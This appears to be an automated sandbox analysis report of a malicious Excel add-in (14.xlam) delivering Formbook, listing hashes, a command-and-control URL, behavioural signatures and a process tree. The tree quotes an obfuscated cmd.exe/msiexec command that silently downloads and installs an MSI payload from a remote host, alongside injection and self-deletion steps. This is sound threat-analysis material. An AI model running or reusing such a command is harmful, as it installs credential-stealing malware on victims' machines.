Analysis
- max time kernel: 148s
- max time network: 142s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 06-05-2021 14:25
Static task: static1
Behavioral task: behavioral1
Sample: 14.xlam
Resource: win7v20210408
General
- Target: 14.xlam
- Size: 15KB
- MD5: 11e9376ee19889ee5c08e816b1d3b231
- SHA1: d22b56bedc58de7da73d647a5f3048b9cabc17d7
- SHA256: cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c
- SHA512: fe846e63b1616166bebed98bdea82f1d141a23a0abc68cf6dc94216f9b0242859dcebd5471aa0943a46a5ecfca1e430badaf049db4469ec3a13a252b2eb8164b
Malware Config
Extracted
formbook
4.1
http://www.111bjs.com/ccr/
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2656 | 4084 | cmd.exe | EXCEL.EXE
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4128-188-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral2/memory/4128-190-0x0000000000560000-0x00000000006AA000-memory.dmp | formbook
behavioral2/memory/4216-198-0x00000000030E0000-0x000000000310E000-memory.dmp | formbook
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
16 | 2608 | msiexec.exe
Executes dropped EXE 2 IoCs
Processes:
pid | process
2228 | MSI47A1.tmp
4128 | MSI47A1.tmp
Loads dropped DLL 1 IoCs
Processes:
pid | process
2228 | MSI47A1.tmp
Use of msiexec (install) with remote resource 1 IoCs
Processes:
pid | process
2440 | msiexec.exe
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\F: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 2228 set thread context of 4128 | 2228 | MSI47A1.tmp | MSI47A1.tmp
PID 4128 set thread context of 3008 | 4128 | MSI47A1.tmp | Explorer.EXE
PID 4128 set thread context of 3008 | 4128 | MSI47A1.tmp | Explorer.EXE
PID 4216 set thread context of 3008 | 4216 | ipconfig.exe | Explorer.EXE
Drops file in Windows directory 6 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI4676.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI47A1.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI424E.tmp | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
NSIS installer 6 IoCs
Processes:
resource | yara_rule
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_2
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_2
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_1
C:\Windows\Installer\MSI47A1.tmp | nsis_installer_2
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
4216 | ipconfig.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
4084 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 58 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3008 | Explorer.EXE
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
pid | process
2228 | MSI47A1.tmp
4128 | MSI47A1.tmp
4128 | MSI47A1.tmp
4128 | MSI47A1.tmp
4128 | MSI47A1.tmp
4216 | ipconfig.exe
4216 | ipconfig.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
pid | process
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
4084 | EXCEL.EXE
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
3008 | Explorer.EXE
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
description | pid | process | target process
PID 4084 wrote to memory of 2656 | 4084 | EXCEL.EXE | cmd.exe
PID 4084 wrote to memory of 2656 | 4084 | EXCEL.EXE | cmd.exe
PID 2656 wrote to memory of 2440 | 2656 | cmd.exe | msiexec.exe
PID 2656 wrote to memory of 2440 | 2656 | cmd.exe | msiexec.exe
PID 2608 wrote to memory of 2228 | 2608 | msiexec.exe | MSI47A1.tmp
PID 2608 wrote to memory of 2228 | 2608 | msiexec.exe | MSI47A1.tmp
PID 2608 wrote to memory of 2228 | 2608 | msiexec.exe | MSI47A1.tmp
PID 2228 wrote to memory of 4128 | 2228 | MSI47A1.tmp | MSI47A1.tmp
PID 2228 wrote to memory of 4128 | 2228 | MSI47A1.tmp | MSI47A1.tmp
PID 2228 wrote to memory of 4128 | 2228 | MSI47A1.tmp | MSI47A1.tmp
PID 2228 wrote to memory of 4128 | 2228 | MSI47A1.tmp | MSI47A1.tmp
PID 3008 wrote to memory of 4216 | 3008 | Explorer.EXE | ipconfig.exe
PID 3008 wrote to memory of 4216 | 3008 | Explorer.EXE | ipconfig.exe
PID 3008 wrote to memory of 4216 | 3008 | Explorer.EXE | ipconfig.exe
PID 4216 wrote to memory of 4260 | 4216 | ipconfig.exe | cmd.exe
PID 4216 wrote to memory of 4260 | 4216 | ipconfig.exe | cmd.exe
PID 4216 wrote to memory of 4260 | 4216 | ipconfig.exe | cmd.exe
Processes
- C:\Windows\Explorer.EXE
  C:\Windows\Explorer.EXE 1⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of UnmapMainImage
  - Suspicious use of WriteProcessMemory
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\14.xlam" 2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/4409212.msi /qn 3⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\msiexec.exe
  mSiExec /i http://farm-finn.com/admin/4409212.msi /qn 4⤵
  - Use of msiexec (install) with remote resource
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\ipconfig.exe
  "C:\Windows\SysWOW64\ipconfig.exe" 2⤵
  - Suspicious use of SetThreadContext
  - Gathers network information
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Windows\Installer\MSI47A1.tmp" 3⤵
- C:\Windows\system32\msiexec.exe
  C:\Windows\system32\msiexec.exe /V 1⤵
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\Installer\MSI47A1.tmp
  "C:\Windows\Installer\MSI47A1.tmp" 2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
- C:\Windows\Installer\MSI47A1.tmp
  "C:\Windows\Installer\MSI47A1.tmp" 3⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
  MD5: 4fcb2a3ee025e4a10d21e1b154873fe2
  SHA1: 57658e2fa594b7d0b99d02e041d0f3418e58856b
  SHA256: 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
  SHA512: 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
- C:\Windows\Installer\MSI47A1.tmp
  MD5: d8a19f13154e81e9d526077422655453
  SHA1: 573e6aed1534203b36f9a8e5121c125b02e11b0f
  SHA256: b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853
  SHA512: 193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae
- \Users\Admin\AppData\Local\Temp\nsq4973.tmp\3dd73lht.dll
  MD5: df8beafa8d4250032a73e261c80e35e3
  SHA1: 3ced0abd9f02d24d79ede5052f661108b01df997
  SHA256: a57717b0b91bb128761a4363d12cacd45431c7e512d5a8d307b40cf30e6a26da
  SHA512: bf9fd7009e3c4919b2b230748c8f3795423b4e7e57d82d531a31682916dfb589c2df2b20320a51b532e21dec98ce597a4a80589ec5fa442417274661e1c9d1ce